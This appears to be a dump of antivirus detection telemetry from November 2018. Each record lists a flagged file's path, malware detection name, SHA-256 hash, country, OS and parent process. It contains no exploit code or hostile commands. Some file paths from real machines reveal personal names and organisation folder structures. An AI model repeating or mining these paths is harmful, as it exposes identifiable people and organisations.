  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055817-4354af30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055817-4354AF30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060158-c77bc17c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060158-C77BC17C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051223-d9fc8f88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051223-D9FC8F88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060911-c9668b82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060911-C9668B82', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053443-f8d5b7dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053443-F8D5B7DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055919-6848cac3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055919-6848CAC3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051447-3028f025', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051447-3028F025', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062228-a451300f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062228-A451300F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061523-a766661e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061523-A766661E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061552-b836053d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061552-B836053D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-204553-c3a15e1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_72a51702\\AVSCAN-20181101-204243-A28B5228\\AVSCAN-20181101-204553-C3A15E1E', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='0303f6a8f595004c1d07d61cc3f7aad928b84be3d46c0aec7e6163ef718a34ce', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='entitas.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\BPJS KESEHATAN\\2015\\ENTITAS\\ENTITAS.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114706-b5522a2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3cdc0ac5\\AVSCAN-20181101-114604-ACAA707D\\AVSCAN-20181101-114706-B5522A2D', filesize=1920000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='1ec7a1b2fe126b7041a87a1f3b5d05409635c6c4555d40625662833f0965a7f6', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:47:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='01a hm nen mat.xls', filepath='\\\\?\\D:\\Lưu Lại Pc\\DU LIEU DIEP\\16-NHAT ANH - HOANG LONG\\1-NHAT ANH\\Tran Duy Hung\\01a HM nen mat.xls', filesize=1856000, name='X2000M/Agent.2835988.#M1.#R1'), hash='523d9b08036713e2823a13aaaf070dbd93446f649ccbe41434b65ef2b4cabb6b', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:17:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dec6iksr.dll', filepath='\\?\\C:\\Windows\\DEC6ikSr.dll', filesize=192000, name='Adware/ELEX.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:03:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gassassinscreedrevelations.exe', filepath='D:\\Black_Box\\Assassins Creed - Revelations\\gAssassinsCreedRevelations.exe', filesize=768000, name='W32/Jeefo.A.#M1.#R1'), hash='1958360734022dc3d75ee5ca3c19e0e7ec68b90d3dd301403ff2baf95c96b631', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T22:40:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155931-e544b2e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155931-E544B2E4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='monitoring air.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\LAPORAN MONITORING AIR\\MONITORING AIR.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111836-73f4e71f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29d3b47a\\AVSCAN-20181101-111019-17917D8C\\AVSCAN-20181101-111836-73F4E71F', filesize=376000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='4156f4d4c6dcd10fd89dad7ea0e2a96cd76855c4eb7a0c64ddee7a96272cb2c4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:18:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152518-40745214', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152518-40745214', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:44:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154716-69945d1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154716-69945D1B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe863_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe863 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T05:10:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='file.bat', filepath='D:\\DATA_SHARE\\dini\\FILE\\FILE.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='150774176925071.exe', filepath='\\\\?\\C:\\Temp\\150774176925071.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T13:08:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='D:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T12:26:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155436-b3af09b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155436-B3AF09B8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwha3e3.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHA3E3.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:30:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T15:21:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T09:17:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dokumentasi apar.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\DOKUMENTASI SOSIALISASI\\dokumentasi apar\\dokumentasi apar.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='europa universalis 4 v1.18.1.0 trainer +25 mrantifun.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa0.725\\europa universalis 4 v1.18.1.0 trainer +25 mrantifun.exe', filesize=4864000, name='SPR/CheatEngine.a5a5bb.#M1.#R1'), hash='a5a5bbbe8b42191e7dc1cd37d2f69836089c0f7bba0af8140d05d059b4cb0926', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1540096, timestamp='2018-11-01T14:00:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7325c0baa6abde90413720551470deb500e0bbd7d09938270413cfac141aeaee', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\7325C0BAA6ABDE90413720551470DEB500E0BBD7D09938270413CFAC141AEAEE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7325c0baa6abde90413720551470deb500e0bbd7d09938270413cfac141aeaee', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:52:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121109-62fddaee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121034-45021E96\\AVSCAN-20181101-121109-62FDDAEE', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:11:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_ba2e8a34.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_ba2e8a34.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='ad89b75827d2f9c125614f4d7d18aaae981a86dde80d5763cfbeb604a624e869', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:43:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='catch!.bat', filepath='C:\\Users\\X\\Documents\\Catch!\\Catch!.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f_00b00a', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00b00a', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='cf6c113a22587766ee6de6895df8d56fc651213926f6235d9d175e42b00cd4ba', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-01T11:19:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d12ed16dfccb859a04ea6d2a728a74c0fdc8ab8e7209054875222e85ca735343', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\D12ED16DFCCB859A04EA6D2A728A74C0FDC8AB8E7209054875222E85CA735343', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='d12ed16dfccb859a04ea6d2a728a74c0fdc8ab8e7209054875222e85ca735343', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T05:43:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='printqueuecleaner.exe', filepath='K:\\HBCD\\Programs\\PRINTQUEUECLEANER.EXE', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151600-185c0a55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_647c0d6c\\AVSCAN-20181101-151541-14A85C15\\AVSCAN-20181101-151600-185C0A55', filesize=576000, name='TR/Dropper.MSIL.97545.#M1.#R1'), hash='df51caf4f72b8e4fad3e5afa11d40330cb554b5f6d67544891976283798597e3', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:15:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134142-98ae7e5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0049131\\AVSCAN-20181101-134125-95938041\\AVSCAN-20181101-134142-98AE7E5D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:41:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='201511.exe', filepath='C:\\Users\\X\\Desktop\\Images\\WhatsApp\\201511\\201511.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:IRUtyC\\\\\\/ZIEW+9+\\\\\\/K.1', country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T13:49:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nscCB85.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T19:59:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211613-06e8b42a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c35755c0\\AVSCAN-20181101-205751-6D3D76CC\\AVSCAN-20181101-211613-06E8B42A', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='cd2a73795bcd963999c929a1ad3f17695eb7e5773effdc96473fca2dc8cc20de', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:46:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-audio-audiocore_31bf3856ad364e35_6.1.7601.23403_none_793a69235bf87c5b\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='c2b9d3d31b8dbdb7d8c0487a19841ae676cbcbc075892bdfa64eddb386417d17', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:17:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214143-b9e89ecd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3eb0228e\\AVSCAN-20181101-214107-B43275A0\\AVSCAN-20181101-214143-B9E89ECD', filesize=2944000, name='TR/StartPage.znvqb.#M1.#R1'), hash='9107e1f142e31753482b286c260b0de595da2c084aefa3b4732f35a68360f58d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:41:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Clover\\clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:06:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered cocil', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cocil', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='bb671a85c05eae3ff8f1f9960d0ab0737007be78aabaab445c57de9012be9ef4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:40:50Z'), dt=datetime.date(2018, 11, 1)),
